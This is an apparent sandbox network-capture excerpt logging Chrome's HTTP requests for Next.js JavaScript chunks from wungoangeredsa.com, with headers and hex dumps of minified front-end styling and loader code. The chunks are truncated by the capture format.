                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 73 63 6f 6e 6e 65 63 74 28 29 7d 29 2c 6e 29 2c 74 3d 75 2e 63 75 72 72 65 6e 74 3b 72 65 74 75 72 6e 20 74 26 26 65 2e 6f 62 73 65 72 76 65 28 74 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 7d 7d 29 2c 5b 75 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 72 6f 6f 74 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 72 6f 6f 74 4d 61 72 67 69 6e 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 74 68 72 65 73 68 6f 6c 64 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6f 6e 63 65 5d 29 2c 7b 72 65 66 3a 75 2c 69 6e 56 69 65 77 3a 74 2c 65 6e
                                                                                                          Data Ascii: isconnect()}),n),t=u.current;return t&&e.observe(t),function(){e.disconnect()}}),[u,null===n||void 0===n?void 0:n.root,null===n||void 0===n?void 0:n.rootMargin,null===n||void 0===n?void 0:n.threshold,null===n||void 0===n?void 0:n.once]),{ref:u,inView:t,en
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 61 64 38 32 34 37 32 61 2d 30 22 7d 29 28 69 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 69 72 65 63 74 69 6f 6e 7c 7c 22 63 6f 6c 75 6d 6e 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 7c 7c 22 63 65 6e 74 65 72 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 61 6c 69 67 6e 49 74 65 6d 73 7c 7c 22 73 74 61 72 74 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 67 61 70 7c 7c 22 31 72 65 6d 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 69 72 65 63 74 69 6f 6e
                                                                                                          Data Ascii: withConfig({componentId:"sc-ad82472a-0"})(i(),(function(n){return n.$direction||"column"}),(function(n){return n.$justifyContent||"center"}),(function(n){return n.$alignItems||"start"}),(function(n){return n.$gap||"1rem"}),(function(n){return n.$direction
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 30 2e 34 73 20 65 61 73 65 3b 5c 6e 20 20 7a 2d 69 6e 64 65 78 3a 20 22 2c 22 3b 5c 6e 20 20 6f 70 61 63 69 74 79 3a 20 22 2c 22 3b 5c 6e 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 5c 6e 20 20 68 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 66 69 6c 74 65 72 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 43 4f 4e 46 45 54 54 49 3d 22 63 6f 6e 66 65 74 74 69 22 2c 6e 2e 53 45 4c 44 4f 4d 5f 43 4f 4e 46 45 54 54 49 3d 22 73 65 6c 64 6f 6d 5f 63 6f 6e 66 65 74 74 69 22 2c 6e 2e 4d 4f 4e 45 59 3d 22 6d 6f 6e 65 79 22 2c 6e 2e 53 4e 4f 57 3d 22 73 6e 6f 77 22 2c
                                                                                                          Data Ascii: ition: opacity 0.4s ease;\n z-index: ",";\n opacity: ",";\n pointer-events: none;\n height: ",";\n filter: ",";\n"]);return w=function(){return n},n}!function(n){n.CONFETTI="confetti",n.SELDOM_CONFETTI="seldom_confetti",n.MONEY="money",n.SNOW="snow",
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 3d 65 2e 72 61 69 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 69 6c 74 65 72 29 2c 22 29 22 29 7c 7c 30 7d 29 29 7d 2c 32 34 36 30 37 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 65 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 7d 29 3b 76 61 72 20 72 3d 74 28 35 36 37 35 33 29 2c 69 3d 74 28 39 32 32 32 38 29 2c 61 3d 74 28 39 33 38 38 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 69 2e 5a 29 28 5b 22 5c 6e 20 20 30 25 20 7b 5c 6e 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 34 30 72 65 6d 20 30 3b 5c 6e 20 20 7d 5c 6e 20 20 31 30 30 25 20 7b 5c 6e 20 20 20 20 62 61 63 6b 67 72 6f
                                                                                                          Data Ascii: =e.rain)||void 0===t?void 0:t.filter),")")||0}))},24607:function(n,e,t){"use strict";t.d(e,{O:function(){return f}});var r=t(56753),i=t(92228),a=t(93888);function o(){var n=(0,i.Z)(["\n 0% {\n background-position: -40rem 0;\n }\n 100% {\n backgro


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.450073104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/87040b3d41357533-1736072686539.6a095265338b008b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-bcc3"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415e6daec47f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 37 64 63 31 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 35 38 35 30 5d 2c 7b 36 33 37 35 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 74 2e 64 28 65 2c 7b 45 33 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 69 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 72 2c 69 3d 74 28 39 38 38 30 30 29 2c 61 3d 74 28 32 37 39 35 31 29 3b 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 51 55 45 53 54 49 4f 4e 53 3d 22 71 75 65 73 74 69 6f 6e 73 22 2c 6e 2e 50 52
                                                                                                          Data Ascii: 7dc1"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[15850],{6375:function(n,e,t){t.d(e,{E3:function(){return o},ed:function(){return r},iM:function(){return u}});var r,i=t(98800),a=t(27951);!function(n){n.QUESTIONS="questions",n.PR
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 29 2c 6c 3d 74 28 39 31 34 39 29 2c 66 3d 74 28 37 36 34 33 35 29 2c 49 3d 74 28 34 31 32 30 36 29 2c 70 3d 74 28 37 37 34 39 36 29 2c 41 3d 74 28 38 30 37 39 35 29 2c 4e 3d 74 28 39 38 38 30 30 29 2c 45 3d 74 28 32 31 38 31 38 29 2c 68 3d 74 28 31 31 31 33 33 29 2c 67 3d 74 28 39 37 38 39 37 29 2c 78 3d 74 28 32 39 37 35 34 29 2c 6d 3d 74 28 34 36 38 38 39 29 2c 76 3d 74 28 34 38 30 34 35 29 2c 43 3d 74 28 37 33 34 37 30 29 2c 5f 3d 74 28 31 39 34 39 35 29 2c 47 3d 74 28 39 35 37 39 38 29 2c 52 3d 74 28 32 37 39 38 29 2c 77 3d 74 28 36 30 38 31 35 29 2c 4c 3d 74 28 37 33 35 35 37 29 2c 54 3d 74 28 37 37 32 36 31 29 2c 53 3d 74 28 35 36 33 37 35 29 2c 42 3d 74 28 38 35 34 37 33 29 2c 62 3d 74 28 34 38 34 33 30 29 2c 46 3d 74 28 31 33 37 30 31 29 2c 79 3d
                                                                                                          Data Ascii: ),l=t(9149),f=t(76435),I=t(41206),p=t(77496),A=t(80795),N=t(98800),E=t(21818),h=t(11133),g=t(97897),x=t(29754),m=t(46889),v=t(48045),C=t(73470),_=t(19495),G=t(95798),R=t(2798),w=t(60815),L=t(73557),T=t(77261),S=t(56375),B=t(85473),b=t(48430),F=t(13701),y=
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 64 65 78 3a 20 34 3b 5c 6e 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 61 70 70 65 61 72 54 6f 6f 6c 74 69 70 20 30 2e 35 73 20 65 61 73 65 2d 6f 75 74 20 66 6f 72 77 61 72 64 73 3b 5c 6e 5c 6e 20 20 40 6b 65 79 66 72 61 6d 65 73 20 61 70 70 65 61 72 54 6f 6f 6c 74 69 70 20 7b 5c 6e 20 20 20 20 30 25 20 7b 5c 6e 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 5c 6e 20 20 20 20 7d 5c 6e 20 20 20 20 31 30 30 25 20 7b 5c 6e 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 5c 6e 20 20 20 20 7d 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 26 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 6c 65 66 74 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 5c 6e 20 20 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 5c 6e 20 20 20 20
                                                                                                          Data Ascii: dex: 4;\n animation: appearTooltip 0.5s ease-out forwards;\n\n @keyframes appearTooltip {\n 0% {\n opacity: 0;\n }\n 100% {\n opacity: 1;\n }\n }\n\n &:after {\n left: 100%;\n top: 50%;\n border: solid transparent;\n
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 22 3a 22 3f 22 2c 65 2b 3d 22 73 74 65 70 3d 22 2e 63 6f 6e 63 61 74 28 69 29 7d 28 30 2c 65 6e 2e 53 6a 29 28 7b 63 75 72 72 65 6e 74 54 61 62 55 72 6c 3a 65 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 7d 2c 72 6e 3d 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 62 6c 61 63 6b 2d 67 69 66 74 2e 35 30 36 30 35 61 36 31 2e 73 76 67 22 2c 61 6e 3d 33 36 2c 6f 6e 3d 33 36 2c 75 6e 3d 74 28 32 37 39 35 31 29 2c 63 6e 3d 74 28 32 38 36 35 29 2c 73 6e 3d 63 28 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 65 28 36 32 32 32 31 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 32 32 32 31 29 29 7d 29 2c 7b 6c 6f 61 64 61 62 6c 65 47 65 6e 65 72 61 74 65 64 3a 7b 77 65 62 70 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                          Data Ascii: ":"?",e+="step=".concat(i)}(0,en.Sj)({currentTabUrl:e.toString()})},rn="/_next/static/media/black-gift.50605a61.svg",an=36,on=36,un=t(27951),cn=t(2865),sn=c()((function(){return t.e(62221).then(t.bind(t,62221))}),{loadableGenerated:{webpack:function(){ret
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 64 6c 65 50 65 72 63 65 6e 74 61 67 65 3a 22 31 38 25 22 2c 24 67 72 61 64 69 65 6e 74 45 6e 64 50 65 72 63 65 6e 74 61 67 65 3a 22 33 33 25 22 7d 29 7d 7d 29 2c 41 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 75 2c 63 2c 57 2c 4d 2c 5a 3d 6e 2e 63 6f 6e 66 69 67 2c 6b 3d 28 30 2c 5f 2e 62 70 29 28 29 2c 4f 3d 6b 2e 73 74 61 74 65 2c 56 3d 4f 2e 61 75 74 6f 65 78 69 74 2c 44 3d 4f 2e 75 73 65 72 44 61 74 61 2c 58 3d 6b 2e 64 69 73 70 61 74 63 68 2c 6a 3d 28 30 2c 54 2e 4d 29 28 29 2e 73 79 6e 63 4d 65 74 72 69 63 2c 71 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 29 28 21 31 29 2c 4a 3d 71 5b 30 5d 2c 65 6e 3d 71 5b 31 5d 2c 41 6e 3d 28 30 2c 52 2e 64 29 28 7b 69 73 43 6f 6e 76 65 72 73 69 6f 6e 45 6e 61 62 6c 65 64 3a 6e 75 6c 6c 3d 3d 3d 5a
                                                                                                          Data Ascii: dlePercentage:"18%",$gradientEndPercentage:"33%"})}}),An=function(n){var e,u,c,W,M,Z=n.config,k=(0,_.bp)(),O=k.state,V=O.autoexit,D=O.userData,X=k.dispatch,j=(0,T.M)().syncMetric,q=(0,s.useState)(!1),J=q[0],en=q[1],An=(0,R.d)({isConversionEnabled:null===Z
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 4c 49 47 48 54 3a 63 61 73 65 20 4e 2e 49 2e 4d 4f 4e 45 59 3a 72 65 74 75 72 6e 22 23 30 30 30 22 3b 63 61 73 65 20 4e 2e 49 2e 44 41 52 4b 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 66 39 66 39 66 39 22 7d 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 23 33 35 35 65 33 62 22 3b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 30 30 31 66 36 36 22 7d 7d 3b 72 65 74 75 72 6e 7b 63 6f 6d 6d 65 6e 74 73 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 22 74 72 61
                                                                                                          Data Ascii: nction(n){switch(n){case N.I.LIGHT:case N.I.MONEY:return"#000";case N.I.DARK:default:return"#f9f9f9"}},a=function(n){switch(n){case N.I.FINANCE_RATING_GREEN:return"#355e3b";case N.I.FINANCE_RATING:default:return"#001f66"}};return{comments:{background:"tra
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 34 37 34 37 34 37 22 7d 7d 28 6e 29 2c 70 61 64 64 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 4c 49 47 48 54 3a 63 61 73 65 20 4e 2e 49 2e 4d 4f 4e 45 59 3a 72 65 74 75 72 6e 22 30 20 38 70 78 20 38 70 78 22 3b 63 61 73 65 20 4e 2e 49 2e 44 41 52 4b 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 38 70 78 22 7d 7d 28 6e 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 7d 2c 61 75 74 68 6f 72 4e 61 6d 65 3a 7b 63 6f 6c 6f 72 3a 65 28 6e 29 7d 2c 74 65 78 74 3a 7b 63 6f 6c 6f 72 3a 65 28 6e 29 7d 2c 64 61 74 65 3a 7b 66 6c 65 78 3a 22 31 22 7d 2c 63 6f 75 6e 74 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72
                                                                                                          Data Ascii: efault:return"#474747"}}(n),padding:function(n){switch(n){case N.I.LIGHT:case N.I.MONEY:return"0 8px 8px";case N.I.DARK:default:return"8px"}}(n),borderRadius:"4px"},authorName:{color:e(n)},text:{color:e(n)},date:{flex:"1"},count:{backgroundColor:"transpar
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 35 30 30 70 78 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 22 7d 7d 28 6e 29 2c 62 6f 72 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 22 3a 22 22 7d 28 6e 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 31 36 70 78 22 3a 22 22 7d 28 6e 29 7d 2c 63 6f 6e 74 61 69 6e 65 72 3a 7b 77 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 22 3a 22 31 30 30 25 22 7d
                                                                                                          Data Ascii: NANCE_RATING_GREEN:return"500px";default:return""}}(n),border:function(n){return n===N.I.BLACK_BLUE?"1px solid #fff":""}(n),borderRadius:function(n){return n===N.I.BLACK_BLUE?"16px":""}(n)},container:{width:function(n){return n===N.I.BLACK_BLUE?"":"100%"}
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 23 65 63 66 64 36 35 22 3b 63 61 73 65 20 4e 2e 49 2e 44 41 52 4b 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 66 66 66 22 7d 7d 28 6e 29 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 7d 2c 74 69 74 6c 65 3a 7b 66 6f 6e 74 53 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 31 35 70 78 22 3b 63 61 73 65 20 4e 2e 49 2e 47 49 56 45 41 57 41 59 3a 72 65 74 75 72 6e 22 32 32 70 78 22 3b 63 61 73 65 20 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3a 72 65 74 75 72 6e
                                                                                                          Data Ascii: NCE_RATING_GREEN:return"#ecfd65";case N.I.DARK:default:return"#fff"}}(n),textAlign:"center"},title:{fontSize:function(n){switch(n){case N.I.FINANCE_RATING:case N.I.FINANCE_RATING_GREEN:return"15px";case N.I.GIVEAWAY:return"22px";case N.I.BLACK_BLUE:return
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 34 30 30 70 78 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 22 7d 7d 28 6e 29 2c 67 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 31 34 70 78 22 3a 22 22 7d 28 6e 29 2c 67 61 70 4d 65 64 69 61 34 38 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 31 32 70 78 22 3b
                                                                                                          Data Ascii: itch(n){case N.I.FINANCE_RATING:case N.I.FINANCE_RATING_GREEN:return"400px";default:return""}}(n),gap:function(n){return n===N.I.BLACK_BLUE?"14px":""}(n),gapMedia480:function(n){switch(n){case N.I.FINANCE_RATING:case N.I.FINANCE_RATING_GREEN:return"12px";


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.450074104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/81cd5f76d0de6e9e-1736072686539-dd624469daa80f67.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-6f9c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415e79f86a55-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 36 66 39 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 64 29 7b 76 61 72 20 63 3d 61 5b 64 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 63 29 72 65 74 75 72 6e 20 63 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 62 3d 61 5b 64 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 74 3d 21 30 3b 74 72 79 7b 65 5b 64 5d 2e 63 61 6c 6c 28 62 2e 65 78 70 6f 72 74 73 2c 62 2c 62 2e 65 78 70 6f 72 74 73 2c 66 29 2c 74 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 26 26 64 65 6c 65 74 65 20 61 5b 64 5d 7d 72 65 74 75 72 6e 20 62 2e 65 78 70 6f 72 74 73 7d 66 2e 6d 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 66 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 61 2c
                                                                                                          Data Ascii: 6f9c!function(){"use strict";var e={},a={};function f(d){var c=a[d];if(void 0!==c)return c.exports;var b=a[d]={exports:{}},t=!0;try{e[d].call(b.exports,b,b.exports,f),t=!1}finally{t&&delete a[d]}return b.exports}f.m=e,function(){var e=[];f.O=function(a,
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 74 2e 6b 65 79 73 28 66 2e 66 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 61 2c 64 29 7b 72 65 74 75 72 6e 20 66 2e 66 5b 64 5d 28 65 2c 61 29 2c 61 7d 29 2c 5b 5d 29 29 7d 2c 66 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 37 39 35 32 39 3d 3d 3d 65 3f 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 30 63 35 31 61 63 30 63 31 36 65 64 34 31 30 31 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 64 32 63 64 63 32 33 37 62 64 64 63 66 30 62 62 2e 6a 73 22 3a 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 22 2b 7b 31 38 32 3a 22 62 64 33 63 64 32 61 30 61 65 63 35 63 30 31 34 22 2c 38 38 34 3a 22 32 39 61 61 66 64 33 63 33 30 30 61 66 35 63 31 22 2c 31 30 35 31 3a 22 66 36 32 39 37 63 36 64 62 62 65 31 61 65 64 34 22 2c 31 32 38 35
                                                                                                          Data Ascii: t.keys(f.f).reduce((function(a,d){return f.f[d](e,a),a}),[]))},f.u=function(e){return 79529===e?"static/chunks/0c51ac0c16ed4101-1736072686539-d2cdc237bddcf0bb.js":"static/chunks/"+{182:"bd3cd2a0aec5c014",884:"29aafd3c300af5c1",1051:"f6297c6dbbe1aed4",1285
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 66 32 37 38 39 31 33 61 22 2c 31 30 34 34 39 3a 22 39 37 37 35 64 61 34 61 32 37 35 31 34 38 35 62 22 2c 31 30 36 32 32 3a 22 31 38 34 64 31 39 36 38 65 61 62 39 62 35 36 61 22 2c 31 30 36 34 38 3a 22 63 31 38 31 30 65 33 62 30 32 33 65 63 31 64 36 22 2c 31 30 38 30 39 3a 22 64 64 38 33 34 36 61 36 65 33 62 33 35 63 36 65 22 2c 31 31 30 31 33 3a 22 62 62 34 62 33 31 33 35 63 31 30 35 64 32 61 39 22 2c 31 31 30 38 35 3a 22 63 36 63 66 64 64 38 66 31 66 66 38 62 33 33 31 22 2c 31 31 34 38 35 3a 22 62 66 66 36 36 35 63 66 36 34 37 33 66 39 61 33 22 2c 31 31 35 30 34 3a 22 65 64 61 64 31 38 39 61 61 33 37 38 38 37 61 34 22 2c 31 31 37 31 31 3a 22 32 32 34 65 32 62 31 61 66 33 32 31 35 34 39 30 22 2c 31 32 31 37 33 3a 22 35 66 30 66 64 38 35 61 33 35 64 66
